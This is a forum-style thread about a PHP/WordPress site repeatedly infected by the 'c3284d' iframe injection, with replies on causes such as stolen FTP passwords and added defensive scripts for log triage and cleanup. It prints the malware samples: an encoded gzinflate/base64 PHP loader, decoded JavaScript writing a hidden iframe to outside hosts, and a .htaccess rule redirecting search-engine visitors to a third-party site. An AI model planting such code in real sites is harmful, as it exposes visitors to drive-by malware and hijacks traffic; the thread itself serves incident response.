Site iframe attack - embed code in source code

Over the past few days, my site has repeatedly been the subject of an iframe attack. The code is added mainly to PHP and JavaScript pages. The code is then PHP base64-encoded, see the example (I changed the code a bit to neutralize it):

#c3284d# echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L"))); #/c3284d# 

Decoded, it looks something like this:

 <script type="text/javascript"> document.write( '<iframe src="http://opticmoxie.com/xxxxxxx.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>' ); 

The only common thing is that all the code carries the comment "#c3284d#", so tracking down the malicious code is not difficult. But it takes a lot of time ...

We are on a shared server at Gradwell (UK) and they were not particularly helpful. So the question is: what can I do to prevent this problem from recurring? I know about MySQL injection attacks and use PHP's mysql_real_escape_string to protect against them.

The site is PHP and MySQL. We use MySQLFTP and have a shell account to access SSH. We use Wordpress (latest update with plugins disabled).

+6
8 answers

I had the same problem. FTP server access logs showed that the changes were made using a hacked FTP password.

+1

I have the same problem, with variants of different hacked files on different domains. The only thing I notice is WordPress. We have WordPress on many of these servers, and I think this is the common culprit. I updated all my WordPress installs and changed all the passwords for all the domain accounts. Not sure if the problem is completely resolved.

+1

I had the same problem, but on a WordPress site.

I assume that the site was infected through widgets, because I use one plugin that allows you to execute PHP code.

My best solution was:

  • eliminate a suspicious widget;
  • see the time and date of one infected file (my case: header.php);
  • clean all infected files (in my case, I have a backup copy of the site);
  • search in the log file for suspicious IP addresses at this time (search for found IP addresses in blacklists);
  • install one plugin to ban suspicious IP addresses.

From that moment, the problem disappeared. Hope this helps you.

+1
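The fourth step in the list above (find the IPs that hit the site around the infected file's modification time, then check them against blacklists) can be scripted. The following is an added example written for this page, not the answerer's code: it converts Apache combined-log timestamps to epoch seconds in awk, then lists the client IPs whose requests fall within a window around the file's mtime. The access log lines are constructed, and the log path and the stat command mentioned in the comments are assumptions about a typical Linux host.

```shell
#!/bin/sh
# Added example (not code from the answer above): given the modification time
# of an infected file, list the client IPs that hit the site in a window
# around that moment so they can be checked against blacklists.
# The access log below is constructed; in practice point ips_near_time at the
# real log (e.g. /var/log/apache2/access.log, an assumed path).
set -u

# Convert an Apache combined-log timestamp (DD/Mon/YYYY:HH:MM:SS and +ZZZZ)
# to Unix epoch seconds in UTC. Done in awk so it does not depend on GNU date.
apache_ts_to_epoch() {
    printf '%s %s\n' "$1" "$2" | awk '
    # days since 1970-01-01 for a proleptic Gregorian date
    function days_from_civil(y, m, d,    era, yoe, doy, doe) {
        if (m <= 2) y--
        era = int((y >= 0 ? y : y - 399) / 400)
        yoe = y - era * 400
        doy = int((153 * (m + (m > 2 ? -3 : 9)) + 2) / 5) + d - 1
        doe = yoe * 365 + int(yoe / 4) - int(yoe / 100) + doy
        return era * 146097 + doe - 719468
    }
    BEGIN {
        n = split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", names, " ")
        for (i = 1; i <= n; i++) mon[names[i]] = i
    }
    {
        split($1, t, "[/:]")   # t[1]=day t[2]=Mon t[3]=year t[4]=hh t[5]=mm t[6]=ss
        secs = days_from_civil(t[3] + 0, mon[t[2]], t[1] + 0) * 86400
        secs += t[4] * 3600 + t[5] * 60 + t[6]
        sign = (substr($2, 1, 1) == "-") ? -1 : 1
        off = sign * (substr($2, 2, 2) * 3600 + substr($2, 4, 2) * 60)
        print secs - off
    }'
}

# Print the client IP of every line in log $1 whose timestamp is within $3
# seconds of epoch $2. Assumes the combined log format: IP first, then the
# "[timestamp" and "zone]" tokens as the 4th and 5th fields.
emit_ips_in_window() {
    log="$1"; center="$2"; window="$3"
    while read -r ip ident user ts tz rest; do
        ts=$(printf '%s' "$ts" | tr -d '[')
        tz=$(printf '%s' "$tz" | tr -d ']')
        delta=$(( $(apache_ts_to_epoch "$ts" "$tz") - center ))
        if [ "$delta" -lt 0 ]; then delta=$((-delta)); fi
        if [ "$delta" -le "$window" ]; then printf '%s\n' "$ip"; fi
    done < "$log"
}

# Same, aggregated as "count ip", most active client first.
ips_near_time() {
    emit_ips_in_window "$1" "$2" "$3" | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Constructed sample log: one client works on wp-login and the widgets page
# right around the time the file was modified, another posts from a +0200
# zone at the same moment, the rest is ordinary traffic hours away.
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.7 - - [10/Oct/2012:13:54:50 +0000] "GET /wp-login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:55:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:55:31 +0000] "POST /wp-admin/widgets.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Oct/2012:13:55:40 +0000] "POST /wp-admin/widgets.php HTTP/1.1" 200 220 "-" "curl/7.26"
198.51.100.20 - - [10/Oct/2012:15:56:00 +0200] "GET /header.php HTTP/1.1" 200 100 "-" "curl/7.26"
192.0.2.44 - - [10/Oct/2012:11:02:03 +0000] "GET / HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.45 - - [10/Oct/2012:18:30:00 +0200] "GET /about/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
}

# Demo. On a real host the centre time comes from the infected file, e.g.
#   stat -c %Y wp-content/themes/mytheme/header.php   (GNU stat; BSD: stat -f %m)
demo() {
    log=$(mktemp)
    write_sample_log "$log"
    mtime=$(apache_ts_to_epoch "10/Oct/2012:13:55:36" "+0000")
    ips_near_time "$log" "$mtime" 120    # two minutes either side of the change
    rm -f "$log"
}
demo
```

The timezone offset in each log line is applied before comparing, so logs written in local time still line up with an mtime taken from `stat`. Widen the window if the file was rewritten several times, and treat the result as a shortlist to check against blacklists and your own admin IPs, not as proof on its own.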

Had the same problem on all the WordPress sites that I administer. I didn't find the source of the infection; I'm sure that it is a worm on my computer or some kind of plugin that I installed on all the sites.

I found all the files that had been changed in the logs of the WP-Better Security plugin, deleted the added infected code, and afterwards did chmod 444 on all the files that had been the source of the infection.

Now I have been free of the evil iframes / .htaccess changes and other things for 1 month.

+1

I had the same problem and found that the method they used was a hacked FTP password.

Even though it runs on a cPanel server with cPHulk brute force protection turned on, I found that the hackers were getting around it by coming in from thousands of different compromised hosts.

Fortunately, I had a log of all the files that had been uploaded, so I wrote a script to restore those files from backups.

Then I increased the cPanel brute force protection levels, reducing the number of unsuccessful attempts required before account lockout.

+1

I recommend you take a look at this:
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
It also has a script to clean it up.

+1

I have the same problem too. In my case, the added code was:

 <!--c3284d--><script type="text/javascript"> document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script><!--/c3284d--> 

In addition, there is a .htaccess file as shown below:

 #c3284d#
 <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
 RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php [R=301,L]
 </IfModule>
 #/c3284d#

I found two articles about this problem: http://www.webmasterworld.com/html/4472821.htm and http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

Hope this helps

0

The bad guys have access to your code, so you need to close their access. In the meantime you can use a simple script that checks for and deletes all the lines where it detects gzinflate(base64_decode(, but even the best code (checksum) checker with backup files will be useless if they still have access.

-1
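The marker from the question (#c3284d# wrapped around a gzinflate(base64_decode(...)) call, or the <!--c3284d--> HTML form seen in a later answer) and the checksum-against-backup idea in the answer just above can be combined into a small triage script for the SSH shell the asker already has. The following is an added example written for this page, not code from any poster; the directory layout, file names and injected contents it builds are constructed for the demonstration, and the dummy payload is not the real one.

```shell
#!/bin/sh
# Added example (not code from the question or any answer): defender-side
# triage for the "#c3284d#" injection discussed in this thread. It finds files
# carrying the marker or the gzinflate(base64_decode( decoder call, diffs the
# live tree against a sha256 baseline taken from a clean backup, and strips
# single-line marked spans. All paths and contents below are constructed.
set -u

MARKER='c3284d'

# Print every .php/.js/.htaccess file under $1 that carries the comment marker
# or the decoder call. Returns 0 if something matched, 1 if the tree is clean.
scan_for_injection() {
    hits=$(find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '.htaccess' \) \
        -exec grep -l -e "#$MARKER#" -e "<!--$MARKER-->" -e 'gzinflate(base64_decode(' {} + 2>/dev/null)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Write "sha256  ./relative/path" for every file under $1 into $2, sorted by
# path. Take it from the clean backup and keep it outside the web root.
make_baseline() {
    (cd "$1" && find . -type f -exec sha256sum {} +) | sort -k2 > "$2"
}

# Print the relative path of every file under $1 that is modified, added or
# missing compared with baseline $2. Returns 0 when nothing changed, else 1.
check_baseline() {
    tmp=$(mktemp)
    make_baseline "$1" "$tmp"
    changed=$(diff "$2" "$tmp" | awk '/^[<>]/ { print $3 }' | sort -u)
    rm -f "$tmp"
    if [ -z "$changed" ]; then return 0; fi
    printf '%s\n' "$changed"
    return 1
}

# Remove "#c3284d# ... #/c3284d#" and "<!--c3284d--> ... <!--/c3284d-->" spans
# that start and end on the same line, writing the result to $2 and leaving
# $1 untouched. The multi-line .htaccess block is deliberately not handled:
# restore that file from backup instead.
strip_marked_spans() {
    sed -e "s|#$MARKER#.*#/$MARKER#||g" \
        -e "s|<!--$MARKER-->.*<!--/$MARKER-->||g" "$1" > "$2"
}

# Build a constructed clean backup and a tampered live copy under a temp dir
# and print that dir: index.php gets the one-line injection, stats.php is a
# dropped file, app.js is untouched.
build_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/backup" "$d/live"
    printf '<?php\necho "hello";\n' > "$d/backup/index.php"
    printf 'var a = 1;\n' > "$d/backup/app.js"
    cp "$d/backup/index.php" "$d/backup/app.js" "$d/live/"
    # dummy payload "AAAA" stands in for the real encoded blob
    printf '<?php #%s# echo(gzinflate(base64_decode("AAAA"))); #/%s#\necho "hello";\n' \
        "$MARKER" "$MARKER" > "$d/live/index.php"
    printf '<!--%s--><script>document.write("x")</script><!--/%s-->\n' \
        "$MARKER" "$MARKER" > "$d/live/stats.php"
    printf '%s\n' "$d"
}

demo() {
    d=$(build_sample_tree)
    make_baseline "$d/backup" "$d/baseline.sha256"
    echo "== files with injection markers =="
    scan_for_injection "$d/live"
    echo "== files differing from the clean backup =="
    check_baseline "$d/live" "$d/baseline.sha256"
    strip_marked_spans "$d/live/index.php" "$d/index.cleaned.php"
    echo "== index.php with the marked span removed =="
    cat "$d/index.cleaned.php"
    rm -rf "$d"
}
demo
```

The baseline comparison is what catches what the marker search cannot: a dropped file with no marker, or a block whose marker the next variant changes. Run it from cron against a baseline stored outside the web root, and as the answer above says, the cleanup only sticks once the access path (the FTP password, the PHP-executing widget) is closed.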

Source: https://habr.com/ru/post/920190/
